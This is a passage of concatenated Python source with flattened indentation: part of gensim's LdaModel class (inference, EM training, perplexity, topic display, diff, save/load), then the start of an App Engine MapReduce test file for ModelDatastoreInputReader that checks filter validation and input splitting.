Avoids computing the `phi` variational parameter directly using the
optimization presented in **Lee, Seung: Algorithms for non-negative matrix factorization, NIPS 2001**.
"""
try:
_ = len(chunk)
except Exception:
# convert iterators/generators to plain list, so we have len() etc.
chunk = list(chunk)
if len(chunk) > 1:
logger.debug("performing inference on a chunk of %i documents", len(chunk))
# Initialize the variational distribution q(theta|gamma) for the chunk
gamma = self.random_state.gamma(100., 1. / 100., (len(chunk), self.num_topics))
Elogtheta = dirichlet_expectation(gamma)
expElogtheta = np.exp(Elogtheta)
if collect_sstats:
sstats = np.zeros_like(self.expElogbeta)
else:
sstats = None
converged = 0
# Now, for each document d update that document's gamma and phi
# Inference code copied from Hoffman's `onlineldavb.py` (esp. the
# Lee&Seung trick which speeds things up by an order of magnitude, compared
# to Blei's original LDA-C code, cool!).
for d, doc in enumerate(chunk):
if len(doc) > 0 and not isinstance(doc[0][0], six.integer_types + (np.integer,)):
# make sure the term IDs are ints, otherwise np will get upset
ids = [int(id) for id, _ in doc]
else:
ids = [id for id, _ in doc]
cts = np.array([cnt for _, cnt in doc])
gammad = gamma[d, :]
Elogthetad = Elogtheta[d, :]
expElogthetad = expElogtheta[d, :]
expElogbetad = self.expElogbeta[:, ids]
# The optimal phi_{dwk} is proportional to expElogthetad_k * expElogbetad_w.
# phinorm is the normalizer.
# TODO treat zeros explicitly, instead of adding 1e-100?
phinorm = np.dot(expElogthetad, expElogbetad) + 1e-100
# Iterate between gamma and phi until convergence
for _ in xrange(self.iterations):
lastgamma = gammad
# We represent phi implicitly to save memory and time.
# Substituting the value of the optimal phi back into
# the update for gamma gives this update. Cf. Lee&Seung 2001.
gammad = self.alpha + expElogthetad * np.dot(cts / phinorm, expElogbetad.T)
Elogthetad = dirichlet_expectation(gammad)
expElogthetad = np.exp(Elogthetad)
phinorm = np.dot(expElogthetad, expElogbetad) + 1e-100
# If gamma hasn't changed much, we're done.
meanchange = np.mean(abs(gammad - lastgamma))
if (meanchange < self.gamma_threshold):
converged += 1
break
gamma[d, :] = gammad
if collect_sstats:
# Contribution of document d to the expected sufficient
# statistics for the M step.
sstats[:, ids] += np.outer(expElogthetad.T, cts / phinorm)
if len(chunk) > 1:
logger.debug("%i/%i documents converged within %i iterations",
converged, len(chunk), self.iterations)
if collect_sstats:
# This step finishes computing the sufficient statistics for the
# M step, so that
# sstats[k, w] = \sum_d n_{dw} * phi_{dwk}
# = \sum_d n_{dw} * exp{Elogtheta_{dk} + Elogbeta_{kw}} / phinorm_{dw}.
sstats *= self.expElogbeta
return gamma, sstats
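    # Illustrative sketch, assuming `lda` is a trained LdaModel and `doc_bow` a
    # bag-of-words document (hypothetical usage of inference()):
    #
    #     gamma, _ = lda.inference([doc_bow])      # gamma.shape == (1, lda.num_topics)
    #     topic_dist = gamma[0] / gamma[0].sum()   # normalized topic distribution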
def do_estep(self, chunk, state=None):
"""
Perform inference on a chunk of documents, and accumulate the collected
sufficient statistics in `state` (or `self.state` if None).
"""
if state is None:
state = self.state
gamma, sstats = self.inference(chunk, collect_sstats=True)
state.sstats += sstats
state.numdocs += gamma.shape[0] # avoids calling len(chunk) on a generator
return gamma
def update_alpha(self, gammat, rho):
"""
Update parameters for the Dirichlet prior on the per-document
topic weights `alpha` given the last `gammat`.
"""
N = float(len(gammat))
logphat = sum(dirichlet_expectation(gamma) for gamma in gammat) / N
self.alpha = update_dir_prior(self.alpha, N, logphat, rho)
logger.info("optimized alpha %s", list(self.alpha))
return self.alpha
def update_eta(self, lambdat, rho):
"""
Update parameters for the Dirichlet prior on the per-topic
word weights `eta` given the last `lambdat`.
"""
N = float(lambdat.shape[0])
logphat = (sum(dirichlet_expectation(lambda_) for lambda_ in lambdat) / N).reshape((self.num_terms,))
self.eta = update_dir_prior(self.eta, N, logphat, rho)
return self.eta
def log_perplexity(self, chunk, total_docs=None):
"""
Calculate and return per-word likelihood bound, using the `chunk` of
        documents as evaluation corpus. Also output the calculated statistics, incl.
perplexity=2^(-bound), to log at INFO level.
"""
if total_docs is None:
total_docs = len(chunk)
corpus_words = sum(cnt for document in chunk for _, cnt in document)
subsample_ratio = 1.0 * total_docs / len(chunk)
perwordbound = self.bound(chunk, subsample_ratio=subsample_ratio) / (subsample_ratio * corpus_words)
logger.info("%.3f per-word bound, %.1f perplexity estimate based on a held-out corpus of %i documents with %i words" %
(perwordbound, np.exp2(-perwordbound), len(chunk), corpus_words))
return perwordbound
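    # Illustrative sketch, assuming `lda` is a trained LdaModel and `heldout_chunk` a
    # list of bag-of-words documents: the returned value is a per-word bound, so the
    # perplexity estimate logged above corresponds to
    #
    #     perwordbound = lda.log_perplexity(heldout_chunk)
    #     perplexity = np.exp2(-perwordbound)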
def update(self, corpus, chunksize=None, decay=None, offset=None,
passes=None, update_every=None, eval_every=None, iterations=None,
gamma_threshold=None, chunks_as_numpy=False):
"""
Train the model with new documents, by EM-iterating over `corpus` until
the topics converge (or until the maximum number of allowed iterations
        is reached). `corpus` must be an iterable (repeatable stream of documents).
In distributed mode, the E step is distributed over a cluster of machines.
This update also supports updating an already trained model (`self`)
with new documents from `corpus`; the two models are then merged in
proportion to the number of old vs. new documents. This feature is still
experimental for non-stationary input streams.
For stationary input (no topic drift in new documents), on the other hand,
this equals the online update of Hoffman et al. and is guaranteed to
        converge for any `decay` in (0.5, 1.0]. Additionally, for smaller
`corpus` sizes, an increasing `offset` may be beneficial (see
Table 1 in Hoffman et al.)
Args:
corpus (gensim corpus): The corpus with which the LDA model should be updated.
chunks_as_numpy (bool): Whether each chunk passed to `.inference` should be a np
                array or not. np can in some settings turn the term IDs
                into floats; these will be converted back into integers in
inference, which incurs a performance hit. For distributed
computing it may be desirable to keep the chunks as np
arrays.
For other parameter settings, see :class:`LdaModel` constructor.
"""
# use parameters given in constructor, unless user explicitly overrode them
if decay is None:
decay = self.decay
if offset is None:
offset = self.offset
if passes is None:
passes = self.passes
if update_every is None:
update_every = self.update_every
if eval_every is None:
eval_every = self.eval_every
if iterations is None:
iterations = self.iterations
if gamma_threshold is None:
gamma_threshold = self.gamma_threshold
try:
lencorpus = len(corpus)
except Exception:
logger.warning("input corpus stream has no len(); counting documents")
lencorpus = sum(1 for _ in corpus)
if lencorpus == 0:
logger.warning("LdaModel.update() called with an empty corpus")
return
if chunksize is None:
chunksize = min(lencorpus, self.chunksize)
self.state.numdocs += lencorpus
if update_every:
updatetype = "online"
if passes == 1:
updatetype += " (single-pass)"
else:
updatetype += " (multi-pass)"
updateafter = min(lencorpus, update_every * self.numworkers * chunksize)
else:
updatetype = "batch"
updateafter = lencorpus
evalafter = min(lencorpus, (eval_every or 0) * self.numworkers * chunksize)
updates_per_pass = max(1, lencorpus / updateafter)
logger.info(
"running %s LDA training, %s topics, %i passes over "
"the supplied corpus of %i documents, updating model once "
"every %i documents, evaluating perplexity every %i documents, "
"iterating %ix with a convergence threshold of %f",
updatetype, self.num_topics, passes, lencorpus,
updateafter, evalafter, iterations,
gamma_threshold)
if updates_per_pass * passes < 10:
logger.warning(
"too few updates, training might not converge; consider "
"increasing the number of passes or iterations to improve accuracy")
# rho is the "speed" of updating; TODO try other fncs
# pass_ + num_updates handles increasing the starting t for each pass,
# while allowing it to "reset" on the first pass of each update
def rho():
return pow(offset + pass_ + (self.num_updates / chunksize), -decay)
if self.callbacks:
# pass the list of input callbacks to Callback class
callback = Callback(self.callbacks)
callback.set_model(self)
# initialize metrics list to store metric values after every epoch
self.metrics = defaultdict(list)
for pass_ in xrange(passes):
if self.dispatcher:
logger.info('initializing %s workers' % self.numworkers)
self.dispatcher.reset(self.state)
else:
other = LdaState(self.eta, self.state.sstats.shape)
dirty = False
reallen = 0
for chunk_no, chunk in enumerate(utils.grouper(corpus, chunksize, as_numpy=chunks_as_numpy)):
reallen += len(chunk) # keep track of how many documents we've processed so far
if eval_every and ((reallen == lencorpus) or ((chunk_no + 1) % (eval_every * self.numworkers) == 0)):
self.log_perplexity(chunk, total_docs=lencorpus)
if self.dispatcher:
# add the chunk to dispatcher's job queue, so workers can munch on it
logger.info('PROGRESS: pass %i, dispatching documents up to #%i/%i',
pass_, chunk_no * chunksize + len(chunk), lencorpus)
# this will eventually block until some jobs finish, because the queue has a small finite length
self.dispatcher.putjob(chunk)
else:
logger.info('PROGRESS: pass %i, at document #%i/%i',
pass_, chunk_no * chunksize + len(chunk), lencorpus)
gammat = self.do_estep(chunk, other)
if self.optimize_alpha:
self.update_alpha(gammat, rho())
dirty = True
del chunk
# perform an M step. determine when based on update_every, don't do this after every chunk
if update_every and (chunk_no + 1) % (update_every * self.numworkers) == 0:
if self.dispatcher:
# distributed mode: wait for all workers to finish
logger.info("reached the end of input; now waiting for all remaining jobs to finish")
other = self.dispatcher.getstate()
self.do_mstep(rho(), other, pass_ > 0)
del other # frees up memory
if self.dispatcher:
logger.info('initializing workers')
self.dispatcher.reset(self.state)
else:
other = LdaState(self.eta, self.state.sstats.shape)
dirty = False
# endfor single corpus iteration
if reallen != lencorpus:
raise RuntimeError("input corpus size changed during training (don't use generators as input)")
# append current epoch's metric values
if self.callbacks:
current_metrics = callback.on_epoch_end(pass_)
for metric, value in current_metrics.items():
self.metrics[metric].append(value)
if dirty:
# finish any remaining updates
if self.dispatcher:
# distributed mode: wait for all workers to finish
logger.info("reached the end of input; now waiting for all remaining jobs to finish")
other = self.dispatcher.getstate()
self.do_mstep(rho(), other, pass_ > 0)
del other
dirty = False
# endfor entire corpus update
def do_mstep(self, rho, other, extra_pass=False):
"""
M step: use linear interpolation between the existing topics and
collected sufficient statistics in `other` to update the topics.
"""
logger.debug("updating topics")
# update self with the new blend; also keep track of how much did
# the topics change through this update, to assess convergence
diff = np.log(self.expElogbeta)
self.state.blend(rho, other)
diff -= self.state.get_Elogbeta()
self.sync_state()
# print out some debug info at the end of each EM iteration
self.print_topics(5)
logger.info("topic diff=%f, rho=%f", np.mean(np.abs(diff)), rho)
if self.optimize_eta:
self.update_eta(self.state.get_lambda(), rho)
if not extra_pass:
# only update if this isn't an additional pass
self.num_updates += other.numdocs
def bound(self, corpus, gamma=None, subsample_ratio=1.0):
"""
Estimate the variational bound of documents from `corpus`:
E_q[log p(corpus)] - E_q[log q(corpus)]
Args:
corpus: documents to infer variational bounds from.
gamma: the variational parameters on topic weights for each `corpus`
document (=2d matrix=what comes out of `inference()`).
If not supplied, will be inferred from the model.
subsample_ratio (float): If `corpus` is a sample of the whole corpus,
pass this to inform on what proportion of the corpus it represents.
This is used as a multiplicative factor to scale the likelihood
appropriately.
Returns:
The variational bound score calculated.
"""
score = 0.0
_lambda = self.state.get_lambda()
Elogbeta = dirichlet_expectation(_lambda)
for d, doc in enumerate(corpus): # stream the input doc-by-doc, in case it's too large to fit in RAM
if d % self.chunksize == 0:
logger.debug("bound: at document #%i", d)
if gamma is None:
gammad, _ = self.inference([doc])
else:
gammad = gamma[d]
Elogthetad = dirichlet_expectation(gammad)
# E[log p(doc | theta, beta)]
score += np.sum(cnt * logsumexp(Elogthetad + Elogbeta[:, int(id)]) for id, cnt in doc)
# E[log p(theta | alpha) - log q(theta | gamma)]; assumes alpha is a vector
score += np.sum((self.alpha - gammad) * Elogthetad)
score += np.sum(gammaln(gammad) - gammaln(self.alpha))
score += gammaln(np.sum(self.alpha)) - gammaln(np.sum(gammad))
# Compensate likelihood for when `corpus` above is only a sample of the whole corpus. This ensures
        # that the likelihood is always roughly on the same scale.
score *= subsample_ratio
# E[log p(beta | eta) - log q (beta | lambda)]; assumes eta is a scalar
score += np.sum((self.eta - _lambda) * Elogbeta)
score += np.sum(gammaln(_lambda) - gammaln(self.eta))
if np.ndim(self.eta) == 0:
sum_eta = self.eta * self.num_terms
else:
sum_eta = np.sum(self.eta)
score += np.sum(gammaln(sum_eta) - gammaln(np.sum(_lambda, 1)))
return score
def show_topics(self, num_topics=10, num_words=10, log=False, formatted=True):
"""
Args:
num_topics (int): show results for first `num_topics` topics.
Unlike LSA, there is no natural ordering between the topics in LDA.
The returned `num_topics <= self.num_topics` subset of all topics is
therefore arbitrary and may change between two LDA training runs.
num_words (int): include top `num_words` with highest probabilities in topic.
log (bool): If True, log output in addition to returning it.
formatted (bool): If True, format topics as strings, otherwise return them as
                `(word, probability)` 2-tuples.
Returns:
list: `num_words` most significant words for `num_topics` number of topics
(10 words for top 10 topics, by default).
"""
if num_topics < 0 or num_topics >= self.num_topics:
num_topics = self.num_topics
chosen_topics = range(num_topics)
else:
num_topics = min(num_topics, self.num_topics)
# add a little random jitter, to randomize results around the same alpha
sort_alpha = self.alpha + 0.0001 * self.random_state.rand(len(self.alpha))
sorted_topics = list(matutils.argsort(sort_alpha))
chosen_topics = sorted_topics[:num_topics // 2] + sorted_topics[-num_topics // 2:]
shown = []
topic = self.state.get_lambda()
for i in chosen_topics:
topic_ = topic[i]
topic_ = topic_ / topic_.sum() # normalize to probability distribution
bestn = matutils.argsort(topic_, num_words, reverse=True)
topic_ = [(self.id2word[id], topic_[id]) for id in bestn]
if formatted:
topic_ = ' + '.join(['%.3f*"%s"' % (v, k) for k, v in topic_])
shown.append((i, topic_))
if log:
logger.info("topic #%i (%.3f): %s", i, self.alpha[i], topic_)
return shown
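    # Illustrative sketch, assuming `lda` is a trained LdaModel (hypothetical usage):
    # with formatted=True (the default), show_topics() returns entries such as
    #
    #     [(0, '0.042*"word_a" + 0.031*"word_b" + ...'), (1, '...'), ...]
    #
    # i.e. (topic_id, formatted_topic_string) pairs.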
def show_topic(self, topicid, topn=10):
"""
Args:
topn (int): Only return 2-tuples for the topn most probable words
(ignore the rest).
Returns:
list: of `(word, probability)` 2-tuples for the most probable
words in topic `topicid`.
"""
return [(self.id2word[id], value) for id, value in self.get_topic_terms(topicid, topn)]
def get_topics(self):
"""
Returns:
np.ndarray: `num_topics` x `vocabulary_size` array of floats which represents
the term topic matrix learned during inference.
"""
topics = self.state.get_lambda()
return topics / topics.sum(axis=1)[:, None]
def get_topic_terms(self, topicid, topn=10):
"""
Args:
topn (int): Only return 2-tuples for the topn most probable words
(ignore the rest).
Returns:
list: `(word_id, probability)` 2-tuples for the most probable words
in topic with id `topicid`.
"""
topic = self.get_topics()[topicid]
topic = topic / topic.sum() # normalize to probability distribution
bestn = matutils.argsort(topic, topn, reverse=True)
return [(id, topic[id]) for id in bestn]
def top_topics(self, corpus=None, texts=None, dictionary=None, window_size=None,
coherence='u_mass', topn=20, processes=-1):
"""
Calculate the coherence for each topic; default is Umass coherence.
See the :class:`gensim.models.CoherenceModel` constructor for more info on the
parameters and the different coherence metrics.
Returns:
list: tuples with `(topic_repr, coherence_score)`, where `topic_repr` is a list
of representations of the `topn` terms for the topic. The terms are represented
as tuples of `(membership_in_topic, token)`. The `coherence_score` is a float.
"""
cm = CoherenceModel(
model=self, corpus=corpus, texts=texts, dictionary=dictionary,
window_size=window_size, coherence=coherence, topn=topn,
processes=processes)
coherence_scores = cm.get_coherence_per_topic()
str_topics = []
for topic in self.get_topics(): # topic = array of vocab_size floats, one per term
bestn = matutils.argsort(topic, topn=topn, reverse=True) # top terms for topic
beststr = [(topic[_id], self.id2word[_id]) for _id in bestn] # membership, token
str_topics.append(beststr) # list of topn (float membership, token) tuples
scored_topics = zip(str_topics, coherence_scores)
return sorted(scored_topics, key=lambda tup: tup[1], reverse=True)
def get_document_topics(self, bow, minimum_probability=None, minimum_phi_value=None,
per_word_topics=False):
"""
Args:
bow (list): Bag-of-words representation of the document to get topics for.
minimum_probability (float): Ignore topics with probability below this value
(None by default). If set to None, a value of 1e-8 is used to prevent 0s.
per_word_topics (bool): If True, also returns a list of topics, sorted in
descending order of most likely topics for that word. It also returns a list
                of word_ids and each word's corresponding topics' phi_values, multiplied by
                feature length (i.e., word count).
minimum_phi_value (float): if `per_word_topics` is True, this represents a lower
bound on the term probabilities that are included (None by default). If set
to None, a value of 1e-8 is used to prevent 0s.
Returns:
topic distribution for the given document `bow`, as a list of
`(topic_id, topic_probability)` 2-tuples.
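        Example (usage sketch; assumes `lda` is a trained LdaModel and `doc_bow` is a bag-of-words document):
            >>> lda.get_document_topics(doc_bow, minimum_probability=0.05)
            >>> lda.get_document_topics(doc_bow, per_word_topics=True)  # (document_topics, word_topic, word_phi)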
"""
if minimum_probability is None:
minimum_probability = self.minimum_probability
minimum_probability = max(minimum_probability, 1e-8) # never allow zero values in sparse output
if minimum_phi_value is None:
minimum_phi_value = self.minimum_probability
minimum_phi_value = max(minimum_phi_value, 1e-8) # never allow zero values in sparse output
# if the input vector is a corpus, return a transformed corpus
is_corpus, corpus = utils.is_corpus(bow)
if is_corpus:
kwargs = dict(
per_word_topics=per_word_topics,
minimum_probability=minimum_probability,
minimum_phi_value=minimum_phi_value
)
return self._apply(corpus, **kwargs)
gamma, phis = self.inference([bow], collect_sstats=per_word_topics)
topic_dist = gamma[0] / sum(gamma[0]) # normalize distribution
document_topics = [
(topicid, topicvalue) for topicid, topicvalue in enumerate(topic_dist)
if topicvalue >= minimum_probability
]
if not per_word_topics:
return document_topics
word_topic = [] # contains word and corresponding topic
word_phi = [] # contains word and phi values
for word_type, weight in bow:
phi_values = [] # contains (phi_value, topic) pairing to later be sorted
phi_topic = [] # contains topic and corresponding phi value to be returned 'raw' to user
for topic_id in range(0, self.num_topics):
if phis[topic_id][word_type] >= minimum_phi_value:
# appends phi values for each topic for that word
# these phi values are scaled by feature length
phi_values.append((phis[topic_id][word_type], topic_id))
phi_topic.append((topic_id, phis[topic_id][word_type]))
            # append (word_id, [(topic_0, phi_value), (topic_1, phi_value), ...]) for this word
word_phi.append((word_type, phi_topic))
# sorts the topics based on most likely topic
            # builds word_topic, a list of (word_id, [topic_id_most_probable, topic_id_second_most_probable, ...]) pairs
sorted_phi_values = sorted(phi_values, reverse=True)
topics_sorted = [x[1] for x in sorted_phi_values]
word_topic.append((word_type, topics_sorted))
        return document_topics, word_topic, word_phi  # a 3-tuple when per_word_topics is True
def get_term_topics(self, word_id, minimum_probability=None):
"""
Args:
word_id (int): ID of the word to get topic probabilities for.
minimum_probability (float): Only include topic probabilities above this
value (None by default). If set to None, use 1e-8 to prevent including 0s.
Returns:
list: The most likely topics for the given word. Each topic is represented
as a tuple of `(topic_id, term_probability)`.
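        Example (usage sketch; assumes `lda` is a trained LdaModel and "tree" occurs in its dictionary):
            >>> lda.get_term_topics('tree', minimum_probability=0.01)  # a token is converted to its id internally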
"""
if minimum_probability is None:
minimum_probability = self.minimum_probability
minimum_probability = max(minimum_probability, 1e-8) # never allow zero values in sparse output
# if user enters word instead of id in vocab, change to get id
if isinstance(word_id, str):
word_id = self.id2word.doc2bow([word_id])[0][0]
values = []
for topic_id in range(0, self.num_topics):
if self.expElogbeta[topic_id][word_id] >= minimum_probability:
values.append((topic_id, self.expElogbeta[topic_id][word_id]))
return values
def diff(self, other, distance="kullback_leibler", num_words=100, n_ann_terms=10, diagonal=False, annotation=True, normed=True):
"""
        Calculate the per-topic difference between two LDA models.
        Args:
            other: an instance of `LdaMulticore` or `LdaModel` to compare against.
            distance (str): function applied to calculate the difference between any topic pair.
                Available values: `kullback_leibler`, `hellinger`, `jaccard` and `jensen_shannon`.
            num_words (int): number of the most relevant words to use when distance == `jaccard` (also used for annotation).
            n_ann_terms (int): max number of words in the intersection/symmetric difference between topics (used for annotation).
            diagonal (bool): if True, compute the difference only between topics with identical numbers (returns the diagonal of the diff matrix).
            annotation (bool): whether the intersection or difference of words between two topics should be returned.
            normed (bool): if True, the matrix Z is normalized.
        Returns:
            a matrix Z with shape (m1.num_topics, m2.num_topics), where Z[i][j] is the difference between topic_i and topic_j,
            and an annotation matrix (if `annotation` is True) with shape (m1.num_topics, m2.num_topics, 2, None), where
            annotation[i][j] = [[`int_1`, `int_2`, ...], [`diff_1`, `diff_2`, ...]],
            `int_k` is a word from the intersection of `topic_i` and `topic_j`, and
            `diff_l` is a word from the symmetric difference of `topic_i` and `topic_j`.
Example:
>>> m1, m2 = LdaMulticore.load(path_1), LdaMulticore.load(path_2)
>>> mdiff, annotation = m1.diff(m2)
>>> print(mdiff) # get matrix with difference for each topic pair from `m1` and `m2`
>>> print(annotation) # get array with positive/negative words for each topic pair from `m1` and `m2`
"""
distances = {
"kullback_leibler": kullback_leibler,
"hellinger": hellinger,
"jaccard": jaccard_distance,
"jensen_shannon": jensen_shannon
}
if distance not in distances:
valid_keys = ", ".join("`{}`".format(x) for x in distances.keys())
raise ValueError("Incorrect distance, valid only {}".format(valid_keys))
if not isinstance(other, self.__class__):
            raise ValueError("The parameter `other` must be of type `{}`".format(self.__class__.__name__))
distance_func = distances[distance]
d1, d2 = self.get_topics(), other.get_topics()
t1_size, t2_size = d1.shape[0], d2.shape[0]
annotation_terms = None
fst_topics = [{w for (w, _) in self.show_topic(topic, topn=num_words)} for topic in xrange(t1_size)]
snd_topics = [{w for (w, _) in other.show_topic(topic, topn=num_words)} for topic in xrange(t2_size)]
if distance == "jaccard":
d1, d2 = fst_topics, snd_topics
if diagonal:
assert t1_size == t2_size, "Both input models should have same no. of topics, as the diagonal will only be valid in a square matrix"
# initialize z and annotation array
z = np.zeros(t1_size)
if annotation:
annotation_terms = np.zeros(t1_size, dtype=list)
else:
# initialize z and annotation matrix
z = np.zeros((t1_size, t2_size))
if annotation:
annotation_terms = np.zeros((t1_size, t2_size), dtype=list)
# iterate over each cell in the initialized z and annotation
for topic in np.ndindex(z.shape):
topic1 = topic[0]
if diagonal:
topic2 = topic1
else:
topic2 = topic[1]
z[topic] = distance_func(d1[topic1], d2[topic2])
if annotation:
pos_tokens = fst_topics[topic1] & snd_topics[topic2]
neg_tokens = fst_topics[topic1].symmetric_difference(snd_topics[topic2])
pos_tokens = list(pos_tokens)[:min(len(pos_tokens), n_ann_terms)]
neg_tokens = list(neg_tokens)[:min(len(neg_tokens), n_ann_terms)]
annotation_terms[topic] = [pos_tokens, neg_tokens]
if normed:
if np.abs(np.max(z)) > 1e-8:
z /= np.max(z)
return z, annotation_terms
def __getitem__(self, bow, eps=None):
"""
Args:
bow (list): Bag-of-words representation of a document.
eps (float): Ignore topics with probability below `eps`.
Returns:
topic distribution for the given document `bow`, as a list of
`(topic_id, topic_probability)` 2-tuples.
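        Example (usage sketch; assumes `lda` is a trained LdaModel and `doc_bow` is a bag-of-words document):
            >>> lda[doc_bow]  # same as get_document_topics(doc_bow) with the model's default thresholds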
"""
return self.get_document_topics(bow, eps, self.minimum_phi_value, self.per_word_topics)
def save(self, fname, ignore=['state', 'dispatcher'], separately=None, *args, **kwargs):
"""
Save the model to file.
Large internal arrays may be stored into separate files, with `fname` as prefix.
`separately` can be used to define which arrays should be stored in separate files.
`ignore` parameter can be used to define which variables should be ignored, i.e. left
out from the pickled lda model. By default the internal `state` is ignored as it uses
        its own serialisation, not the one provided by `LdaModel`. The `state` and `dispatcher`
will be added to any ignore parameter defined.
Note: do not save as a compressed file if you intend to load the file back with `mmap`.
Note: If you intend to use models across Python 2/3 versions there are a few things to
keep in mind:
1. The pickled Python dictionaries will not work across Python versions
2. The `save` method does not automatically save all np arrays using np, only
those ones that exceed `sep_limit` set in `gensim.utils.SaveLoad.save`. The main
concern here is the `alpha` array if for instance using `alpha='auto'`.
Please refer to the wiki recipes section (https://github.com/piskvorky/gensim/wiki/Recipes-&-FAQ#q9-how-do-i-load-a-model-in-python-3-that-was-trained-and-saved-using-python-2)
for an example on how to work around these issues.
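        Example (usage sketch; the path below is a placeholder):
            >>> lda.save('/tmp/lda_model')  # also writes /tmp/lda_model.state, /tmp/lda_model.id2word, ...
            >>> lda2 = LdaModel.load('/tmp/lda_model', mmap='r')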
"""
if self.state is not None:
self.state.save(utils.smart_extension(fname, '.state'), *args, **kwargs)
# Save the dictionary separately if not in 'ignore'.
if 'id2word' not in ignore:
utils.pickle(self.id2word, utils.smart_extension(fname, '.id2word'))
# make sure 'state', 'id2word' and 'dispatcher' are ignored from the pickled object, even if
# someone sets the ignore list themselves
if ignore is not None and ignore:
if isinstance(ignore, six.string_types):
ignore = [ignore]
ignore = [e for e in ignore if e] # make sure None and '' are not in the list
ignore = list(set(['state', 'dispatcher', 'id2word']) | set(ignore))
else:
ignore = ['state', 'dispatcher', 'id2word']
# make sure 'expElogbeta' and 'sstats' are ignored from the pickled object, even if
# someone sets the separately list themselves.
separately_explicit = ['expElogbeta', 'sstats']
# Also add 'alpha' and 'eta' to separately list if they are set 'auto' or some
# array manually.
if (isinstance(self.alpha, six.string_types) and self.alpha == 'auto') or (isinstance(self.alpha, np.ndarray) and len(self.alpha.shape) != 1):
separately_explicit.append('alpha')
if (isinstance(self.eta, six.string_types) and self.eta == 'auto') or (isinstance(self.eta, np.ndarray) and len(self.eta.shape) != 1):
separately_explicit.append('eta')
# Merge separately_explicit with separately.
if separately:
if isinstance(separately, six.string_types):
separately = [separately]
separately = [e for e in separately if e] # make sure None and '' are not in the list
separately = list(set(separately_explicit) | set(separately))
else:
separately = separately_explicit
super(LdaModel, self).save(fname, ignore=ignore, separately=separately, *args, **kwargs)
@classmethod
def load(cls, fname, *args, **kwargs):
"""
Load a previously saved object from file (also see `save`).
Large arrays can be memmap'ed back as read-only (shared memory) by setting `mmap='r'`:
>>> LdaModel.load(fname, mmap='r')
"""
kwargs['mmap'] = kwargs.get('mmap', None)
result = super(LdaModel, cls).load(fname, *args, **kwargs)
# check if `random_state` attribute has been set after main pickle load
# if set -> the model to be loaded was saved using a >= 0.13.2 version of Gensim
# if not set -> the model to be loaded was saved using a < 0.13.2 version of Gensim, so set `random_state` as the default value
if not hasattr(result, 'random_state'):
result.random_state = utils.get_random_state(None) # using default value `get_random_state(None)`
logging.warning("random_state not set so using default value")
state_fname = utils.smart_extension(fname, '.state')
try:
result.state = super(LdaModel, cls).load(state_fname, *args, **kwargs)
except Exception as e:
logging.warning("failed to load state from %s: %s", state_fname, e)
id2word_fname = utils.smart_extension(fname, '.id2word')
# check if `id2word_fname` file is present on disk
# if present -> the model to be loaded was saved using a >= 0.13.2 version of Gensim, so set `result.id2word` using the `id2word_fname` file
# if not present -> the model to be loaded was saved using a < 0.13.2 version of Gensim, so `result.id2word` already set after the main pickle load
if (os.path.isfile(id2word_fname)):
try:
result.id2word = utils.unpickle(id2word_fname)
except Exception as e:
logging.warning("failed to load id2word dictionary from %s: %s", id2word_fname, e)
return result
# endclass LdaModel
|
lgpl-2.1
|
talele08/appengine-mapreduce
|
python/test/mapreduce/api/map_job/model_datastore_input_reader_test.py
|
15
|
8510
|
#!/usr/bin/env python
"""Model Datastore Input Reader tests for the map_job API."""
# os_compat must be first to ensure timezones are UTC.
# pylint: disable=g-bad-import-order
from google.appengine.tools import os_compat # pylint: disable=unused-import
import datetime
import unittest
from google.appengine.ext import ndb
from mapreduce import errors
from testlib import testutil
from mapreduce.api import map_job
from mapreduce.api.map_job import datastore_input_reader_base_test
from mapreduce.api.map_job import model_datastore_input_reader
# pylint: disable=invalid-name
class ModelDBDatastoreInputReaderTest(datastore_input_reader_base_test
.DatastoreInputReaderBaseTest):
"""Test ModelDatastoreInputReader using Model.db."""
@property
def reader_cls(self):
return model_datastore_input_reader.ModelDatastoreInputReader
@property
def entity_kind(self):
return testutil.ENTITY_KIND
def testValidate_EntityKindWithNoModel(self):
"""Test validate function with no model."""
params = {
"entity_kind": "foo",
}
conf = map_job.JobConfig(
job_name=self.TEST_JOB_NAME,
mapper=map_job.Mapper,
input_reader_cls=self.reader_cls,
input_reader_params=params,
shard_count=1)
self.assertRaises(errors.BadReaderParamsError,
conf.input_reader_cls.validate,
conf)
def testValidate_Filters(self):
"""Tests validating filters parameter."""
params = {
"entity_kind": self.entity_kind,
"filters": [("a", "=", 1), ("b", "=", 2)],
}
new = datetime.datetime.now()
old = new.replace(year=new.year-1)
conf = map_job.JobConfig(
job_name=self.TEST_JOB_NAME,
mapper=map_job.Mapper,
input_reader_cls=self.reader_cls,
input_reader_params=params,
shard_count=1)
conf.input_reader_cls.validate(conf)
conf.input_reader_params["filters"] = [["a", ">", 1], ["a", "<", 2]]
conf.input_reader_cls.validate(conf)
conf.input_reader_params["filters"] = [["datetime_property", ">", old],
["datetime_property", "<=", new],
["a", "=", 1]]
conf.input_reader_cls.validate(conf)
conf.input_reader_params["filters"] = [["a", "=", 1]]
conf.input_reader_cls.validate(conf)
# Invalid field c
conf.input_reader_params["filters"] = [("c", "=", 1)]
self.assertRaises(errors.BadReaderParamsError,
conf.input_reader_cls.validate,
conf)
# Expect a range.
conf.input_reader_params["filters"] = [("a", "<=", 1)]
self.assertRaises(errors.BadReaderParamsError,
conf.input_reader_cls.validate,
conf)
# Value should be a datetime.
conf.input_reader_params["filters"] = [["datetime_property", ">", 1],
["datetime_property", "<=",
datetime.datetime.now()]]
self.assertRaises(errors.BadReaderParamsError,
conf.input_reader_cls.validate,
conf)
# Expect a closed range.
params["filters"] = [["datetime_property", ">", new],
["datetime_property", "<=", old]]
self.assertRaises(errors.BadReaderParamsError,
conf.input_reader_cls.validate,
conf)
def _set_vals(self, entities, a_vals, b_vals):
"""Set a, b values for entities."""
vals = []
for a in a_vals:
for b in b_vals:
vals.append((a, b))
for e, val in zip(entities, vals):
e.a = val[0]
e.b = val[1]
e.put()
def testSplitInput_shardByFilters_withNs(self):
entities = self._create_entities(range(12), {}, "f")
self._set_vals(entities, list(range(6)), list(range(2)))
params = {
"entity_kind": self.entity_kind,
"namespace": "f",
"filters": [("a", ">", 0),
("a", "<=", 3),
("b", "=", 1)],
}
conf = map_job.JobConfig(
job_name=self.TEST_JOB_NAME,
mapper=map_job.Mapper,
input_reader_cls=self.reader_cls,
input_reader_params=params,
shard_count=2)
results = conf.input_reader_cls.split_input(conf)
self.assertEquals(2, len(results))
self._assertEquals_splitInput(results[0], ["3", "5"])
self._assertEquals_splitInput(results[1], ["7"])
def testSplitInput_shardByFilters_noEntity(self):
params = {
